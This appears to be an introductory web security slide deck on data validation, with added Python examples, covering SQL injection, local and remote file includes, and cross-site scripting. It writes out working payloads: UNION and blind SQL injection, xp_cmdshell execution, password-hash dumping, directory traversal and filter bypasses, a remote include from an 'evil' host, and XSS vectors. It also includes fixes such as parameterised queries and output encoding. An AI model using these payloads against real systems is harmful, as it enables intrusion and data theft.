web application security 101 - 14 data validation
Post on 10-May-2015
Data Validation
Common input validation problems.
Types Of Problems
SQL Injection
Local File Includes
Cross-site Scripting
SQL Injection
SQL Injection is an attack where a partial or complete SQL query is
inserted (injected) into another query run by the targeted application.
Types Of SQL Injection
Vanilla - when errors are displayed: database errors or query results are shown in the response, so the attacker sees the effect of the injection directly.
Blind - when no errors are displayed: nothing from the database is echoed, so the attacker infers results from true/false differences in the response or from timing.
SQL Backends
There are multiple SQL backends, each with its own features and syntax, so injection payloads are backend-specific.
Common Backends
MSSQL (Transact-SQL)
MySQL
PostgreSQL
Oracle (PL/SQL)
Many more
SQL Injection In Principle
Works by injecting SQL fragments into already existing queries.
SELECT * FROM table WHERE column = 'injected by the user'
In Detail
Assuming that $value is a variable controlled by the user and is concatenated into the query string:
$query = "SELECT * FROM table WHERE column = '" . $value . "'";
When $value equals ' OR '1'='1 the query becomes:
SELECT * FROM table WHERE column = '' OR '1'='1'
SQL Injection Techniques
Union selection - to obtain values from other tables (the injected SELECT must return the same number of columns as the original query).
SELECT * FROM table WHERE column = '' UNION SELECT 'a','b','c','d','e'
Boolean selection - to create universally true or false statements.
SELECT * FROM table WHERE column = '' OR '1'='1'
Time-based selection - to confirm an injection by timing the execution (MySQL syntax shown; note the space after --, which MySQL requires for a comment).
SELECT * FROM table WHERE column = '' OR IF(1=1, SLEEP(10), 'false')-- '
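The following Python script is an added example, not code from the original slides. It rebuilds the In Detail query against an in-memory SQLite database (the users table and its rows are constructed for this example), runs the boolean and union techniques above against it, extracts a value blind using only "rows or no rows" answers, and shows the parameterised query that stops all of it. SQLite's sqlite_master stands in for information_schema, and -- starts a comment in SQLite as it does in MSSQL.

```python
import sqlite3


def make_db():
    # Constructed sample schema and rows for this example (not from the slides).
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users (id INTEGER, name TEXT, email TEXT)")
    con.executemany(
        "INSERT INTO users VALUES (?, ?, ?)",
        [(1, "alice", "alice@example.test"), (2, "bob", "bob@example.test")],
    )
    return con


def lookup_vulnerable(con, value):
    # Same shape as the slide's $query: the user string is pasted into the SQL text.
    sql = "SELECT id, name, email FROM users WHERE name = '" + value + "'"
    return con.execute(sql).fetchall()


def lookup_safe(con, value):
    # Parameterised query: the driver sends the value separately, so quotes in it
    # are data and never SQL syntax.
    return con.execute(
        "SELECT id, name, email FROM users WHERE name = ?", (value,)
    ).fetchall()


# Boolean selection: a universally true WHERE clause returns every row.
TAUTOLOGY = "' OR '1'='1"

# Union selection: the injected SELECT must have as many columns as the original
# (three here). sqlite_master lists tables and their CREATE statements.
UNION_DUMP = "' UNION SELECT rootpage, name, sql FROM sqlite_master--"


def blind_extract(con, max_len=40):
    """Blind (boolean) extraction of users.email for id=1.

    Nothing from the database is echoed except whether the query returned any
    rows, so each character is confirmed with a true/false question on SUBSTR().
    """
    charset = "abcdefghijklmnopqrstuvwxyz0123456789@."
    recovered = ""
    for pos in range(1, max_len + 1):
        for ch in charset:
            probe = (f"' OR (SELECT SUBSTR(email,{pos},1) FROM users "
                     f"WHERE id=1)='{ch}'--")
            if lookup_vulnerable(con, probe):   # true -> OR makes every row match
                recovered += ch
                break
        else:
            return recovered  # no character matched: end of the value
    return recovered


if __name__ == "__main__":
    con = make_db()
    print(lookup_vulnerable(con, TAUTOLOGY))   # both rows
    print(lookup_safe(con, TAUTOLOGY))         # []
    print(lookup_vulnerable(con, UNION_DUMP))  # the CREATE TABLE statement
    print(blind_extract(con))                  # alice@example.test
```

The blind loop is the same algorithm sqlmap automates: one request per candidate character, with the only observable being the page's "results / no results" branch.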
MSSQL Injection Techniques
Table enumeration - find the table structure: with errors displayed, the HAVING / GROUP BY error messages leak column names one at a time.
SELECT * FROM table WHERE column = '' HAVING 1=1--
SELECT * FROM table WHERE column = '' GROUP BY column1,columnN HAVING 1=1--
Code execution - running arbitrary OS commands via stacked queries (xp_cmdshell is disabled by default since SQL Server 2005 and requires sysadmin rights to enable).
SELECT * FROM table WHERE column = ''; EXEC master.dbo.xp_cmdshell 'command'--
Query delay - a timing delay after the query, usable for blind injection.
SELECT * FROM table WHERE column = ''; WAITFOR DELAY '0:0:30'--
MySQL Injection Techniques Pt. 1
Finding information - retrieving server variables and functions such as @@version (pad the UNION with one value per column of the original SELECT).
SELECT * FROM table WHERE column = '' AND 1=0 UNION SELECT @@version, 'b', ...
User enumeration - retrieving MySQL server users and password hashes (requires read access to the mysql database; # starts a comment in MySQL).
SELECT * FROM table WHERE column = '' UNION SELECT * FROM mysql.user#'
MySQL Injection Techniques Pt. 2
Table enumeration - retrieving MySQL server tables.
SELECT * FROM t WHERE c = '' UNION SELECT * FROM information_schema.tables#
Column enumeration - retrieving MySQL server columns.
SELECT * FROM t WHERE c = '' UNION SELECT * FROM information_schema.columns#
SQL Injection Tools
Sqlninja
Sqlmap
SQL Injection Is Art
There are many different tools and techniques, of varying levels of
complexity, used to exploit SQL Injection vulnerabilities.
File Includes
This attack vector is used to perform arbitrary file/URL read or
execution, abusing low-level file functions and application-specific features.
Types Of File Includes
Local File Include - when the included file is local.
Remote File Include - when the included file is fetched remotely.
File Include In Principle
Works when user data reaches a function used to fetch a file.
<?php fetchfile("./path/to/file/injected by the user") ?>
In Detail
Assuming that $value is a variable controlled by the user:
<?php fetchfile("./path/to/file/" . $value) ?>
When $value equals ../../../index.php the call becomes:
<?php fetchfile("./path/to/file/../../../index.php") ?>
File Include Techniques Pt. 1
Usage of ../ to traverse the directory structure.
<?php fetchfile("./path/to/file/../../../index.php") ?>
Usage of a null byte (0x00) to terminate the string for the underlying C functions, so any suffix the application appends (such as .txt) is dropped (PHP rejects paths containing a null byte since 5.3.4).
<?php fetchfile("./path/to/file/../../../index.php\0.txt") ?>
File Include Techniques Pt. 2
Usage of an overlong UTF-8 encoding of the dot (0xC0 0xAE) to bypass filters that look only for the literal ../ sequence.
<?php fetchfile("./path/to/file/\xc0\xae./../../index.php\0.txt") ?>
Usage of system resources to cause other behaviour, e.g. /proc/self/environ, which exposes the process environment (on CGI/mod_php setups this includes request-derived variables).
<?php fetchfile("./path/to/file/../../../../../proc/self/environ") ?>
Remote File Includes
This type of problem occurs when the included file is a remote one controlled
by the attacker. The attacker then has full control over the included content,
and if the application executes what it fetches (for example as PHP code) the
result is remote code execution.
<?php fetchfile("http://evil/path/to/file") ?>
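The following Python script is an added example, not code from the original slides, of a hardened fetchfile(): it resolves the user-supplied name inside a fixed include directory and checks containment on the canonical path instead of searching the raw string for "..". The include directory, file names and attack strings are constructed for this example; it rejects each of the techniques above (traversal, null byte, overlong dot, remote URL) and still serves the legitimate file.

```python
import os
import tempfile


def resolve_include(base_dir, user_path):
    """Map a user-supplied include name to an absolute path inside base_dir.

    Raises ValueError (or UnicodeDecodeError) for the bypasses shown on the
    slides: ../ traversal, NUL-byte truncation, overlong UTF-8 dots, and
    remote URLs or absolute paths.
    """
    if isinstance(user_path, bytes):
        # Strict UTF-8 decoding refuses overlong forms such as b"\xc0\xae" for ".",
        # so a lenient decoder cannot later turn them into a real "..".
        user_path = user_path.decode("utf-8", errors="strict")
    if "\x00" in user_path:
        raise ValueError("NUL byte in path")
    if "://" in user_path or user_path.startswith(("/", "\\")):
        raise ValueError("URL or absolute path not allowed")
    base = os.path.realpath(base_dir)
    target = os.path.realpath(os.path.join(base, user_path))
    # Containment is checked on canonical paths, after ../ and symlinks are
    # resolved, rather than by looking for ".." in the raw string.
    if os.path.commonpath([base, target]) != base:
        raise ValueError("path escapes the include directory")
    return target


def fetchfile(base_dir, user_path):
    with open(resolve_include(base_dir, user_path), "rb") as f:
        return f.read()


def is_allowed(base_dir, user_path):
    try:
        resolve_include(base_dir, user_path)
        return True
    except (ValueError, UnicodeDecodeError):
        return False


# Constructed attack strings mirroring the slides' techniques.
ATTACKS = [
    "../secret.txt",                 # plain traversal
    "page.txt\x00../secret.txt",     # NUL byte truncation
    b"\xc0\xae./secret.txt",         # overlong "." followed by "./": "../" to a lenient decoder
    "http://evil/path/to/file",      # remote include
    "/etc/passwd",                   # absolute path
]


def demo():
    # Constructed layout: <tmp>/templates/page.txt is the only legitimate
    # include; <tmp>/secret.txt must stay unreachable.
    with tempfile.TemporaryDirectory() as tmp:
        include_dir = os.path.join(tmp, "templates")
        os.mkdir(include_dir)
        with open(os.path.join(include_dir, "page.txt"), "w") as f:
            f.write("hello")
        with open(os.path.join(tmp, "secret.txt"), "w") as f:
            f.write("top secret")
        return {
            "legit": fetchfile(include_dir, "page.txt"),
            "blocked": [not is_allowed(include_dir, a) for a in ATTACKS],
        }


if __name__ == "__main__":
    print(demo())
```

The stronger fix, where the application allows it, is to not take a path from the user at all and map a short token to a fixed allow-list of files; the containment check above is the fallback when a path really is required.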
FI Is Art
File Include attacks are a popular mechanism for compromising web
applications.
Cross-site Scripting
A type of vulnerability where an attacker can bypass the SOP (Same
Origin Policy) through client-side injection or by abusing certain forms of
configuration.
Types Of XSS
Reflected - when the injection is immediately returned in the response.
Stored - when the injection is stored and served later.
DOM-based - when the injection happens in the browser, through JavaScript.
Others - there are many other uncategorized variants.
XSS In Principle
Works by injecting fragments of HTML/JS inside the web page.
<span>injected by the user</span>
In Detail
Assuming that $value is a variable controlled by the user:
<span><?php echo $value ?></span>
When $value equals <script>alert(1)</script> the page becomes:
<span><script>alert(1)</script></span>
XSS Techniques Pt. 1
When script tags are sanitized or escaped, use another element with an event handler.
<span><img src=a onerror=alert(1)></span>
When the injection occurs inside an event attribute.
<button onclick="alert(1)"></button>
XSS Techniques Pt. 2
When the injection occurs inside a JavaScript string within a script tag (here $value is "; alert(1); ").
<script>var a = ""; alert(1); "";</script>
When the injection occurs in multiple small places: the first point contributes <script>alert(1)/* and the second */</script>, so the markup between them is commented out.
<span><script>alert(1)/* is something like */</script></span>
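The following Python script is an added example, not code from the original slides. It places the slides' rendering of $value beside context-aware output encoding for the three contexts above (HTML text, quoted attribute, JavaScript string) and runs one constructed payload through each, showing that the payload survives the unsafe rendering and is neutralised by the encoded one. Function and variable names are this example's own.

```python
import html
import json


def render_text_unsafe(value):
    # Vulnerable rendering, as on the slides: the value is pasted into the markup.
    return "<span>" + value + "</span>"


def render_text(value):
    # HTML text context: escape & < > " ' so the value can never open a tag.
    return "<span>" + html.escape(value, quote=True) + "</span>"


def render_attr(value):
    # Quoted attribute context: same escaping, and the attribute is always
    # quoted, so the value cannot end the attribute and add an onerror= handler.
    return '<img src="' + html.escape(value, quote=True) + '" alt="">'


def render_js(value):
    # JavaScript string context: JSON-encode (quotes, backslashes and
    # U+2028/2029 become escapes) and also escape "/" so that a "</script>"
    # inside the value cannot close the script element early.
    literal = json.dumps(value).replace("/", "\\/")
    return "<script>var a = " + literal + ";</script>"


# Constructed payloads, one per context from the slides.
PAYLOADS = {
    "text": "<script>alert(1)</script>",
    "attr": 'a" onerror="alert(1)',
    "js": '"; alert(1); "',
    "js_close": "</script><img src=a onerror=alert(1)>",
}


def demo():
    return {
        "unsafe": render_text_unsafe(PAYLOADS["text"]),
        "text": render_text(PAYLOADS["text"]),
        "attr": render_attr(PAYLOADS["attr"]),
        "js": render_js(PAYLOADS["js"]),
        "js_close": render_js(PAYLOADS["js_close"]),
    }


if __name__ == "__main__":
    for ctx, out in demo().items():
        print(ctx, "=>", out)
```

The point of the three separate functions is that the escaping rules belong to the output context, not to the input: the same value needs different treatment in text, in an attribute, and inside a script, and an input filter that strips "<script>" covers none of them.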
Stored XSS
The injection is temporarily or permanently stored, here in the session:
<?php $_SESSION['name'] = $_GET['name'] ?>
Later on this code causes the XSS to occur:
<span><?php echo $_SESSION['name'] ?></span>
DOM-based XSS
The injection may occur at any point but is triggered by JavaScript running in the browser; here a query-string value is written straight into the document:
<script>
// the value comes from the URL and reaches document.write() without encoding
var match = document.location.search.match(/[?&]name=([^&]+)/);
if (match) { document.write("Hello " + decodeURIComponent(match[1])); }
</script>
There are many different ways such an injection can occur.
Other Forms Of XSS
A permissive crossdomain.xml (Flash cross-domain policy) lets Flash content served from any domain make requests to the application with the victim's cookies and read the responses, bypassing the SOP much as XSS does.
<?xml version="1.0" encoding="UTF-8" ?><cross-domain-policy><allow-access-from domain="*"/></cross-domain-policy>
XSS Is Art
Cross-site scripting is a very popular and widespread vulnerability.
Other Input Validation Flaws
Memory Corruption
Command Injection
LDAP Injection
XML Injection
XPath Injection
SSI Injection
Remote File Inclusion
Many, many more
Lab
We will be finding data validation problems.